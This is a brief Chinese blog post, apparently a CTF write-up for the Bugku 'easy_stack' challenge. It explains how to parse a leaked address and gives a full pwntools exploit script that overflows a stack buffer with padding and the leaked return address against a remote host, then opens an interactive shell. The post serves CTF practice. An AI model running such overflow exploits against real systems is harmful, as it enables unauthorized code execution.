bugku easy_stack

主要是关于接受地址后处理的小细节

e9_addr = int((p.recvuntil('\n')[:-1]),16)

应该是将字符串转成16进制的形式后面才能p32()
exp:

from pwn import *

elf = ELF('./pwn')
p = remote('82.157.146.43',15644)
context.log_level = 'debug'

p.recvuntil('give u a magic_address ')
e9_addr = int((p.recvuntil('\n')[:-1]),16)
# print((e9_addr))
# e9_addr

payload = b'A'*(0x88+4)
payload += p32(e9_addr)
p.sendlineafter('D0 U know asm?\n',payload)

p.interactive()

posted @ 2023-09-24 12:57 N0zoM1z0 阅读(15) 评论(0) 编辑收藏举报

刷新页面返回顶部

~Rewrite~

R00T the w0r1d

bugku easy_stack

公告